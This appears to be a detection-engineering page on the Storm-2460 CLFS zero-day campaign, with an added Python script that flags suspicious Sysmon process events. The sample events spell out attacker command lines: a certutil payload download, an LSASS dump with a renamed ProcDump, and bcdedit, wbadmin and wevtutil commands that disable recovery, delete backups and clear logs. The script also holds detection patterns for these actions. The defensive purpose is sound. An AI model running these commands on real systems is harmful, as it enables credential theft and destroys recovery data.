Analytics Story: Storm-2460 CLFS Zero Day Exploitation
Description
This analytic story focuses on the exploitation of a Common Log File System (CLFS) driver vulnerability by the Storm-2460 threat actor. The attack chain involves initial access through a zero-day vulnerability in the Windows CLFS driver, followed by the deployment of PipeMagic malware. The threat actor then leverages various living-off-the-land techniques, including the abuse of MSBuild, CertUtil, and ProcDump, to maintain persistence and exfiltrate data. The attack culminates in ransomware deployment, with the actor taking steps to disable system recovery and clear logs to hinder incident response.
Why it matters
Storm-2460, a sophisticated threat actor, has been observed exploiting a zero-day vulnerability in the Windows Common Log File System (CLFS) driver. The attack begins with the exploitation of the CLFS driver vulnerability, which allows the threat actor to gain initial access to the target system. Following successful exploitation, the actor deploys PipeMagic malware, a custom tool designed to facilitate further system access and control.
Once established on the system, Storm-2460 employs various living-off-the-land techniques to maintain persistence and evade detection. The threat actor frequently uses MSBuild.exe, often renamed or spawned by script processes, to execute malicious code. They also leverage CertUtil.exe for various purposes, including downloading additional payloads and extracting certificates. In their credential theft operations, they utilize ProcDump renamed as dllhost.exe to dump LSASS memory. To cover their tracks, they disable system recovery options through bcdedit and wbadmin commands, while using wevtutil to clear event logs and remove evidence of their activities.
The attack chain demonstrates a high level of sophistication, with the threat actor carefully selecting legitimate Windows tools and utilities to carry out their objectives while minimizing the risk of detection. The use of renamed tools and script-based execution methods helps them blend in with normal system activity, making detection more challenging for security teams.
The final stage of the attack involves the deployment of ransomware, with the threat actor taking specific steps to ensure their encryption activities cannot be easily reversed. They systematically disable Windows recovery options and delete system backups and shadow copies to prevent system restoration. To further hinder incident response and forensic investigation, they clear logs and use legitimate tools in ways that appear normal to security systems. This comprehensive approach to persistence and anti-forensics makes the attack particularly challenging to detect and remediate.
This analytic story provides comprehensive detection coverage for the various stages of the Storm-2460 attack chain, from initial exploitation through ransomware deployment. The included detections focus on identifying the abuse of legitimate tools and unusual system modifications that may indicate the presence of this threat actor. By monitoring for these specific behaviors and tool abuses, security teams can better detect and respond to this sophisticated threat.
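The tool abuses described in this section can be checked against process-creation telemetry (Sysmon Event ID 1, one of the data sources listed for this story) with rules keyed on OriginalFileName rather than the on-disk image name: renaming MSBuild or ProcDump changes the Image field but not the name carried in the PE version resource. The Python below is an added example written for this page, not a detection that ships with the analytic story. The Sysmon field names are real; the rule names, sample events, hostnames, file paths and URL are constructed for the example, and the command-line options matched (certutil -urlcache, bcdedit recoveryenabled no, wbadmin delete, wevtutil cl) come from the utilities' public documentation, not from this page.

```python
"""Hunt over constructed Sysmon Event ID 1 (process creation) records for the
living-off-the-land behaviours described in the Storm-2460 story.

Added example, not a detection from the analytic story itself. Field names
follow Sysmon's Event ID 1 schema; every sample value below is constructed.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """Subset of Sysmon Event ID 1 fields the rules below need."""
    image: str                # Image: on-disk path of the new process
    original_file_name: str   # OriginalFileName: name from the PE version resource
    parent_image: str         # ParentImage: on-disk path of the parent
    command_line: str         # CommandLine


# Script hosts that should not normally be launching a build engine.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe",
                "cmd.exe", "mshta.exe"}


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def _tokens(cmd: str) -> list[str]:
    # Windows command lines are not POSIX shell syntax, so split on whitespace only.
    return [t.lower().strip('"') for t in cmd.split()]


def classify(ev: ProcEvent) -> list[str]:
    """Return the list of rule names the event matches (empty if benign)."""
    img = _basename(ev.image)
    orig = ev.original_file_name.lower()
    parent = _basename(ev.parent_image)
    toks = _tokens(ev.command_line)
    hits: list[str] = []

    # MSBuild renamed on disk: OriginalFileName survives a rename, Image does not.
    if orig == "msbuild.exe" and img != "msbuild.exe":
        hits.append("renamed_msbuild")
    # MSBuild launched by a script host rather than a build tool or IDE.
    if orig == "msbuild.exe" and parent in SCRIPT_HOSTS:
        hits.append("msbuild_spawned_by_script_host")

    # CertUtil used as a downloader: URL-cache switch together with a URL argument.
    if orig == "certutil.exe" and any(t.startswith("http") for t in toks) \
            and any(t.lstrip("-/") == "urlcache" for t in toks):
        hits.append("certutil_download")

    # Sysinternals ProcDump reports OriginalFileName "procdump" / "procdump64".
    if orig.startswith("procdump") and not img.startswith("procdump"):
        hits.append("renamed_procdump")
    if orig.startswith("procdump") and any("lsass" in t for t in toks):
        hits.append("lsass_memory_dump")

    # Recovery tampering and anti-forensics via built-in utilities.
    if orig == "bcdedit.exe" and (
            ("recoveryenabled" in toks and "no" in toks)
            or ("bootstatuspolicy" in toks and "ignoreallfailures" in toks)):
        hits.append("bcdedit_recovery_disabled")
    if orig == "wbadmin.exe" and "delete" in toks:
        hits.append("wbadmin_backup_deleted")
    if orig == "wevtutil.exe" and ("cl" in toks or "clear-log" in toks):
        hits.append("wevtutil_log_cleared")
    return hits


def scan(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Map event index -> matched rules, for events that matched at least one."""
    results: dict[int, list[str]] = {}
    for i, ev in enumerate(events):
        hits = classify(ev)
        if hits:
            results[i] = hits
    return results


# Constructed sample telemetry: two benign rows (1 and 4) among the suspicious ones.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Users\Public\svchost32.exe", "MSBuild.exe",
              r"C:\Windows\System32\wscript.exe",
              r"svchost32.exe C:\Users\Public\build.proj"),
    ProcEvent(r"C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe",
              "MSBuild.exe",
              r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe",
              r"MSBuild.exe App.sln /t:Build"),
    ProcEvent(r"C:\Windows\System32\certutil.exe", "CertUtil.exe",
              r"C:\Windows\System32\cmd.exe",
              r"certutil.exe -urlcache -split -f http://example.invalid/stage2.bin C:\Users\Public\stage2.bin"),
    ProcEvent(r"C:\Windows\Temp\dllhost.exe", "procdump",
              r"C:\Windows\System32\cmd.exe",
              r"dllhost.exe -ma lsass.exe C:\Windows\Temp\l.dmp"),
    ProcEvent(r"C:\Windows\System32\dllhost.exe", "dllhost.exe",
              r"C:\Windows\System32\svchost.exe",
              r"C:\Windows\System32\dllhost.exe /Processid:{00000000-0000-0000-0000-000000000000}"),
    ProcEvent(r"C:\Windows\System32\bcdedit.exe", "bcdedit.exe",
              r"C:\Windows\System32\cmd.exe", r"bcdedit /set {default} recoveryenabled no"),
    ProcEvent(r"C:\Windows\System32\wbadmin.exe", "WBADMIN.EXE",
              r"C:\Windows\System32\cmd.exe", r"wbadmin delete catalog -quiet"),
    ProcEvent(r"C:\Windows\System32\wevtutil.exe", "wevtutil.exe",
              r"C:\Windows\System32\cmd.exe", r"wevtutil cl Security"),
]

if __name__ == "__main__":
    for i, hits in scan(SAMPLE_EVENTS).items():
        print(f"event {i}: {SAMPLE_EVENTS[i].command_line!r} -> {hits}")
```

OriginalFileName is a PE version-resource string and can be edited by whoever built or repacked the binary, so a match here is a signal to correlate with file hash and signer, not proof on its own. In Splunk the same logic maps onto the XmlWinEventLog:Microsoft-Windows-Sysmon/Operational source listed under Data Sources, with the Security 4688 source supplying command lines where Sysmon is absent.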
Detections
Data Sources
Name | Platform | Sourcetype | Source |
---|---|---|---|
CrowdStrike ProcessRollup2 | N/A | crowdstrike:events:sensor | crowdstrike |
Sysmon EventID 1 | | xmlwineventlog | XmlWinEventLog:Microsoft-Windows-Sysmon/Operational |
Sysmon EventID 3 | | xmlwineventlog | XmlWinEventLog:Microsoft-Windows-Sysmon/Operational |
Windows Event Log Security 4688 | | xmlwineventlog | XmlWinEventLog:Security |
References
Source: GitHub | Version: 1